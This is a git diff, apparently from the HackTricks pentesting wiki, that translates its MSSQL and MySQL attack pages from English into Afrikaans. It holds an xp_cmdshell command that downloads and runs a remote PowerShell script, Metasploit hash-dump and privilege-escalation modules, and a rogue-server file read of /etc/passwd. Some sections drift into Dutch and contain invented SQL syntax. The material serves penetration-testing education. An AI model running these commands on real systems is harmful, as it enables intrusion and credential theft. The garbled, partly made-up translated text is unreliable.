SP_CONFIGURE 'xp_cmdshell' , 1 - reconfigure - go - xp_cmdshell `whoami` - go +2. try to turn component back on +EXEC SP_CONFIGURE 'xp_cmdshell' , 1 +reconfigure +go +xp_cmdshell `whoami` +go - 3. 'advanced' turn it back on - EXEC SP_CONFIGURE 'show advanced options', 1 - reconfigure - go - EXEC SP_CONFIGURE 'xp_cmdshell' , 1 - reconfigure - go - xp_cmdshell 'whoami' - go +3. 'advanced' turn it back on +EXEC SP_CONFIGURE 'show advanced options', 1 +reconfigure +go +EXEC SP_CONFIGURE 'xp_cmdshell' , 1 +reconfigure +go +xp_cmdshell 'whoami' +go - xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://10.10.14.60:8000/ye443.ps1')" +xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://10.10.14.60:8000/ye443.ps1')" - https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server +https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server Entry_2: - Name: Nmap for SQL - Description: Nmap with SQL Scripts - Command: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 {IP} - -Entry_3: - Name: MSSQL consolesless mfs enumeration - Description: MSSQL enumeration without the need to run msfconsole - Note: sourced from https://github.com/carlospolop/legion - Command: msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_ping; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_enum; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use admin/mssql/mssql_enum_domain_accounts; set RHOSTS {IP}; set RPORT ; run; exit' &&msfconsole -q -x 'use admin/mssql/mssql_enum_sql_logins; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_dbowner; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_execute_as; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_exec; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_findandsampledata; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_hashdump; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_schemadump; set RHOSTS {IP}; set RPORT ; run; exit' - -``` +Name: Nmap for SQL +Description: Nmap with SQL Scripts +Command: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 {IP} +Entry_3: +Name: MSSQL consolesless mfs enumeration +Description: MSSQL enumeration without the need to run msfconsole +Note: sourced from https://github.com/carlospolop/legion +Command: msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_ping; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_enum; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use admin/mssql/mssql_enum_domain_accounts; set RHOSTS {IP}; set RPORT ; run; exit' &&msfconsole -q -x 'use admin/mssql/mssql_enum_sql_logins; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_dbowner; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_execute_as; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_exec; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_findandsampledata; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_hashdump; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_schemadump; set RHOSTS {IP}; set RPORT ; run; exit' + +```
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md index 69b77ec81..015ee4d73 100644 --- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md +++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/types-of-mssql-users.md @@ -1,45 +1,45 @@ -# Types of MSSQL Users +# Tipes van MSSQL-gebruikers
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-Table taken from the [**docs**](https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-database-principals-transact-sql?view=sql-server-ver16). +Tabel geneem van die [**dokumentasie**](https://learn.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-database-principals-transact-sql?view=sql-server-ver16). -| Column name | Data type | Description | -| ------------------------------------------ | ----------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | -| **name** | **sysname** | Name of principal, unique within the database. | -| **principal\_id** | **int** | ID of principal, unique within the database. | -| **type** | **char(1)** |

Principal type:

A = Application role

C = User mapped to a certificate

E = External user from Azure Active Directory

G = Windows group

K = User mapped to an asymmetric key

R = Database role

S = SQL user

U = Windows user

X = External group from Azure Active Directory group or applications

| -| **type\_desc** | **nvarchar(60)** |

Description of principal type.

APPLICATION_ROLE

CERTIFICATE_MAPPED_USER

EXTERNAL_USER

WINDOWS_GROUP

ASYMMETRIC_KEY_MAPPED_USER

DATABASE_ROLE

SQL_USER

WINDOWS_USER

EXTERNAL_GROUPS

| -| **default\_schema\_name** | **sysname** | Name to be used when SQL name does not specify a schema. Null for principals not of type S, U, or A. | -| **create\_date** | **datetime** | Time at which the principal was created. | -| **modify\_date** | **datetime** | Time at which the principal was last modified. | -| **owning\_principal\_id** | **int** | ID of the principal that owns this principal. All fixed Database Roles are owned by **dbo** by default. | -| **sid** | **varbinary(85)** | SID (Security Identifier) of the principal. NULL for SYS and INFORMATION SCHEMAS. | -| **is\_fixed\_role** | **bit** | If 1, this row represents an entry for one of the fixed database roles: db\_owner, db\_accessadmin, db\_datareader, db\_datawriter, db\_ddladmin, db\_securityadmin, db\_backupoperator, db\_denydatareader, db\_denydatawriter. | -| **authentication\_type** | **int** |

Applies to: SQL Server 2012 (11.x) and later.

Signifies authentication type. The following are the possible values and their descriptions.

0 : No authentication
1 : Instance authentication
2 : Database authentication
3 : Windows authentication
4 : Azure Active Directory authentication

| -| **authentication\_type\_desc** | **nvarchar(60)** |

Applies to: SQL Server 2012 (11.x) and later.

Description of the authentication type. The following are the possible values and their descriptions.

NONE : No authentication
INSTANCE : Instance authentication
DATABASE : Database authentication
WINDOWS : Windows authentication
EXTERNAL: Azure Active Directory authentication

| -| **default\_language\_name** | **sysname** |

Applies to: SQL Server 2012 (11.x) and later.

Signifies the default language for this principal.

| -| **default\_language\_lcid** | **int** |

Applies to: SQL Server 2012 (11.x) and later.

Signifies the default LCID for this principal.

| -| **allow\_encrypted\_value\_modifications** | **bit** |

Applies to: SQL Server 2016 (13.x) and later, SQL Database.

Suppresses cryptographic metadata checks on the server in bulk copy operations. This enables the user to bulk copy data encrypted using Always Encrypted, between tables or databases, without decrypting the data. The default is OFF.

| +| Kolomnaam | Datatipe | Beskrywing | +| ----------------------------------------- | ----------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | +| **name** | **sysname** | Naam van die beginsel, uniek binne die databasis. | +| **principal\_id** | **int** | ID van die beginsel, uniek binne die databasis. | +| **type** | **char(1)** |

Beginsel tipe:

A = Toepassingsrol

C = Gebruiker gekoppel aan 'n sertifikaat

E = Eksterne gebruiker vanuit Azure Active Directory

G = Windows-groep

K = Gebruiker gekoppel aan 'n asimmetriese sleutel

R = Databasisrol

S = SQL-gebruiker

U = Windows-gebruiker

X = Eksterne groep vanuit Azure Active Directory-groep of toepassings

| +| **type\_desc** | **nvarchar(60)** |

Beskrywing van beginsel tipe.

APPLICATION_ROLE

CERTIFICATE_MAPPED_USER

EXTERNAL_USER

WINDOWS_GROUP

ASYMMETRIC_KEY_MAPPED_USER

DATABASE_ROLE

SQL_USER

WINDOWS_USER

EXTERNAL_GROUPS

| +| **default\_schema\_name** | **sysname** | Naam wat gebruik moet word wanneer die SQL-naam nie 'n skema spesifiseer nie. Nul vir beginsels wat nie van die tipe S, U of A is nie. | +| **create\_date** | **datetime** | Tyd waarop die beginsel geskep is. | +| **modify\_date** | **datetime** | Tyd waarop die beginsel laas gewysig is. | +| **owning\_principal\_id** | **int** | ID van die beginsel wat hierdie beginsel besit. Alle vaste databasisrolle word standaard besit deur **dbo**. | +| **sid** | **varbinary(85)** | SID (Security Identifier) van die beginsel. Nul vir SYS en INFORMATION SCHEMAS. | +| **is\_fixed\_role** | **bit** | Indien 1, verteenwoordig hierdie ry 'n inskrywing vir een van die vaste databasisrolle: db\_owner, db\_accessadmin, db\_datareader, db\_datawriter, db\_ddladmin, db\_securityadmin, db\_backupoperator, db\_denydatareader, db\_denydatawriter. | +| **authentication\_type** | **int** |

Van toepassing op: SQL Server 2012 (11.x) en later.

Dui op die tipe outentifikasie. Die volgende is die moontlike waardes en hul beskrywings.

0 : Geen outentifikasie
1 : Instansie-outentifikasie
2 : Databasis-outentifikasie
3 : Windows-outentifikasie
4 : Azure Active Directory-outentifikasie

| +| **authentication\_type\_desc** | **nvarchar(60)** |

Van toepassing op: SQL Server 2012 (11.x) en later.

Beskrywing van die outentifikasie tipe. Die volgende is die moontlike waardes en hul beskrywings.

NONE : Geen outentifikasie
INSTANCE : Instansie-outentifikasie
DATABASE : Databasis-outentifikasie
WINDOWS : Windows-outentifikasie
EXTERNAL: Azure Active Directory-outentifikasie

| +| **default\_language\_name** | **sysname** |

Van toepassing op: SQL Server 2012 (11.x) en later.

Dui die verstektaal vir hierdie beginsel aan.

| +| **default\_language\_lcid** | **int** |

Van toepassing op: SQL Server 2012 (11.x) en later.

Dui die verstek LCID vir hierdie beginsel aan.

| +| **allow\_encrypted\_value\_modifications** | **bit** |

Van toepassing op: SQL Server 2016 (13.x) en later, SQL-databasis.

Onderdruk kriptografiese metadata kontroles op die bediener in massa-kopieerhandelinge. Dit stel die gebruiker in staat om data wat altyd versleutel is, tussen tabelle of databasisse te kopieer sonder om die data te ontsluit. Die verstek is AF.

|
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
diff --git a/network-services-pentesting/pentesting-mysql.md b/network-services-pentesting/pentesting-mysql.md index a4f31a266..acb91f5b0 100644 --- a/network-services-pentesting/pentesting-mysql.md +++ b/network-services-pentesting/pentesting-mysql.md @@ -2,75 +2,74 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevenement in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidspesialiste in elke dissipline. {% embed url="https://www.rootedcon.com/" %} -## **Basic Information** +## **Basiese Inligting** -**MySQL** can be described as an open source **Relational Database Management System (RDBMS)** that is available at no cost. It operates on the **Structured Query Language (SQL)**, enabling the management and manipulation of databases. - -**Default port:** 3306 +**MySQL** kan beskryf word as 'n oopbron **Relational Database Management System (RDBMS)** wat gratis beskikbaar is. Dit werk met die **Structured Query Language (SQL)**, wat die bestuur en manipulasie van databasisse moontlik maak. +**Verstekpoort:** 3306 ``` 3306/tcp open mysql ``` +## **Verbind** -## **Connect** - -### **Local** - +### **Lokaal** ```bash mysql -u root # Connect to root without password mysql -u root -p # A password will be asked (check someone) ``` +### Afstandbediening -### Remote +MySQL kan op afstand worden benaderd via het netwerk. Dit betekent dat een aanvaller toegang kan krijgen tot de MySQL-server vanaf een externe locatie. Dit kan worden gedaan door het IP-adres en de poort van de MySQL-server te achterhalen en vervolgens een verbinding tot stand te brengen met behulp van een MySQL-client. +Om te voorkomen dat een aanvaller toegang krijgt tot de MySQL-server via externe verbindingen, moet de configuratie van de MySQL-server worden aangepast. Dit kan worden gedaan door de bind-address-instelling in het configuratiebestand van MySQL te wijzigen. Door deze instelling te wijzigen in het IP-adres van de lokale machine, wordt voorkomen dat externe verbindingen worden geaccepteerd. + +Het is ook belangrijk om sterke en veilige wachtwoorden te gebruiken voor de MySQL-gebruikersaccounts. Dit helpt bij het voorkomen van brute force-aanvallen waarbij een aanvaller probeert in te loggen op de MySQL-server door verschillende combinaties van gebruikersnamen en wachtwoorden te proberen. + +Daarnaast is het belangrijk om de MySQL-server regelmatig bij te werken met de nieuwste beveiligingspatches. Dit helpt bij het dichten van eventuele beveiligingslekken die kunnen worden misbruikt door aanvallers. + +Ten slotte kan het gebruik van een firewall ook helpen bij het beperken van de toegang tot de MySQL-server. Door alleen specifieke IP-adressen toe te staan ​​om verbinding te maken met de MySQL-server, kan de blootstelling aan externe aanvallen worden verminderd. ```bash mysql -h -u root mysql -h -u root@localhost ``` +## Eksterne Enumerasie -## External Enumeration - -Some of the enumeration actions require valid credentials - +Sommige van die enumerasie-aksies vereis geldige geloofsbriewe ```bash nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 msf> use auxiliary/scanner/mysql/mysql_version msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds msf> use auxiliary/admin/mysql/mysql_enum #Creds -msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds +msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds ``` - ### [**Brute force**](../generic-methodologies-and-resources/brute-force.md#mysql) -### Write any binary data - +### Skryf enige binêre data neer ```bash CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY) CONVERT(from_base64("aG9sYWFhCg=="), BINARY) ``` - -## **MySQL commands** - +## **MySQL-opdragte** ```bash show databases; use ; @@ -107,9 +106,61 @@ quit; mysql -u username -p < manycommands.sql #A file with all the commands you want to execute mysql -u root -h 127.0.0.1 -e 'show databases;' ``` +### MySQL Toestemmingsopsporing -### MySQL Permissions Enumeration +MySQL-toestemmingsopsporing is een belangrijk onderdeel van het pentestproces, omdat het helpt bij het identificeren van mogelijke beveiligingslekken in een MySQL-database. Door de toestemmingsinstellingen van een MySQL-gebruiker te controleren, kunnen we bepalen welke acties de gebruiker kan uitvoeren op de database. +Hier zijn enkele methoden die kunnen worden gebruikt om MySQL-toestemmingen te onderzoeken: + +#### 1. Gebruikerslijst weergeven + +Om de lijst met gebruikers in een MySQL-database weer te geven, kunnen we de volgende query uitvoeren: + +```sql +SELECT user FROM mysql.user; +``` + +#### 2. Toestemmingen van een specifieke gebruiker controleren + +Om de toestemmingen van een specifieke gebruiker te controleren, kunnen we de volgende query uitvoeren: + +```sql +SHOW GRANTS FOR 'gebruikersnaam'@'localhost'; +``` + +#### 3. Toegang tot databases controleren + +Om te controleren welke databases een gebruiker kan benaderen, kunnen we de volgende query uitvoeren: + +```sql +SHOW DATABASES; +``` + +#### 4. Toegang tot tabellen controleren + +Om te controleren welke tabellen een gebruiker kan benaderen, kunnen we de volgende query uitvoeren: + +```sql +SHOW TABLES FROM 'databasenaam'; +``` + +#### 5. Toegang tot kolommen controleren + +Om te controleren welke kolommen een gebruiker kan benaderen, kunnen we de volgende query uitvoeren: + +```sql +SHOW COLUMNS FROM 'databasenaam'.'tabelnaam'; +``` + +#### 6. Toegang tot specifieke SQL-opdrachten controleren + +Om te controleren of een gebruiker specifieke SQL-opdrachten kan uitvoeren, kunnen we de volgende query uitvoeren: + +```sql +SHOW GRANTS FOR 'gebruikersnaam'@'localhost' LIKE '%opdracht%'; +``` + +Het controleren van MySQL-toestemmingen is essentieel om mogelijke beveiligingslekken te identificeren en de beveiliging van een MySQL-database te verbeteren. Door deze methoden toe te passen, kunnen we de toegangsrechten van gebruikers nauwkeurig beoordelen en eventuele kwetsbaarheden opsporen. ```sql #Mysql SHOW GRANTS [FOR user]; @@ -121,7 +172,7 @@ SHOW GRANTS FOR CURRENT_USER(); SELECT * FROM mysql.user; #From DB -select * from mysql.user where user='root'; +select * from mysql.user where user='root'; ## Get users with file_priv select user,file_priv from mysql.user where file_priv='Y'; ## Get users with Super_priv @@ -132,70 +183,62 @@ SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCT #@ Functions not from sys. db SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys'; ``` +Jy kan in die dokumentasie die betekenis van elke voorreg sien: [https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html](https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv\_execute) -You can see in the docs the meaning of each privilege: [https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html](https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv\_execute) - -### MySQL File RCE +### MySQL-lêer RCE {% content-ref url="../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md" %} [mysql-ssrf.md](../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md) {% endcontent-ref %} -## MySQL arbitrary read file by client - -Actually, when you try to **load data local into a table** the **content of a file** the MySQL or MariaDB server asks the **client to read it** and send the content. **Then, if you can tamper a mysql client to connect to your own MySQL server, you can read arbitrary files.**\ -Please notice that this is the behaviour using: +## MySQL willekeurige lees van lêer deur klient +Eintlik, wanneer jy probeer om **data plaaslik in 'n tabel te laai**, vra die MySQL- of MariaDB-bediener die **kliënt om dit te lees** en die inhoud te stuur. **As jy dus 'n mysql-kliënt kan manipuleer om na jou eie MySQL-bediener te verbind, kan jy willekeurige lêers lees.**\ +Let asseblief daarop dat dit die gedrag is wanneer jy gebruik maak van: ```bash load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n'; ``` - -(Notice the "local" word)\ -Because without the "local" you can get: - +(Notisie die "plaaslike" woord)\ +Want sonder die "plaaslike" kan jy kry: ```bash mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n'; ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement ``` - -**Initial PoC:** [**https://github.com/allyshka/Rogue-MySql-Server**](https://github.com/allyshka/Rogue-MySql-Server)\ -**In this paper you can see a complete description of the attack and even how to extend it to RCE:** [**https://paper.seebug.org/1113/**](https://paper.seebug.org/1113/)\ -**Here you can find an overview of the attack:** [**http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/**](http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/) +**Aanvanklike PoC:** [**https://github.com/allyshka/Rogue-MySql-Server**](https://github.com/allyshka/Rogue-MySql-Server)\ +**In hierdie dokument kan jy 'n volledige beskrywing van die aanval sien en selfs hoe om dit uit te brei na RCE:** [**https://paper.seebug.org/1113/**](https://paper.seebug.org/1113/)\ +**Hier kan jy 'n oorsig van die aanval vind:** [**http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/**](http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/) ​
-​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +​​[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheid geleentheid in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n broeiplek vir tegnologie- en kuberveiligheidspesialiste in elke dissipline. {% embed url="https://www.rootedcon.com/" %} ## POST -### Mysql User - -It will be very interesting if mysql is running as **root**: +### Mysql-gebruiker +Dit sal baie interessant wees as mysql as **root** uitgevoer word: ```bash cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user" systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1 ``` +#### Gevaarlike Instellings van mysqld.cnf -#### Dangerous Settings of mysqld.cnf +In die konfigurasie van MySQL-dienste word verskeie instellings gebruik om sy werking en veiligheidsmaatreëls te definieer: -In the configuration of MySQL services, various settings are employed to define its operation and security measures: - -- The **`user`** setting is utilized for designating the user under which the MySQL service will be executed. -- **`password`** is applied for establishing the password associated with the MySQL user. -- **`admin_address`** specifies the IP address that listens for TCP/IP connections on the administrative network interface. -- The **`debug`** variable is indicative of the present debugging configurations, including sensitive information within logs. -- **`sql_warnings`** manages whether information strings are generated for single-row INSERT statements when warnings emerge, containing sensitive data within logs. -- With **`secure_file_priv`**, the scope of data import and export operations is constrained to enhance security. +- Die **`user`**-instelling word gebruik om die gebruiker aan te dui waarin die MySQL-diens uitgevoer sal word. +- **`password`** word gebruik om die wagwoord wat verband hou met die MySQL-gebruiker, te vestig. +- **`admin_address`** spesifiseer die IP-adres wat luister vir TCP/IP-verbindings op die administratiewe netwerkinterface. +- Die **`debug`**-veranderlike dui op die huidige foutopsporingskonfigurasies, insluitend sensitiewe inligting binne loglêers. +- **`sql_warnings`** bestuur of inligtingstrengs gegenereer word vir enkelry-invoegingsopdragte wanneer waarskuwings voorkom, insluitend sensitiewe data binne loglêers. +- Met **`secure_file_priv`** word die omvang van data-invoer- en uitvoeroperasies beperk om die veiligheid te verbeter. -### Privilege escalation - +### Voorregverhoging ```bash # Get current user (an all users) privileges and hashes use mysql; @@ -213,24 +256,20 @@ grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mys 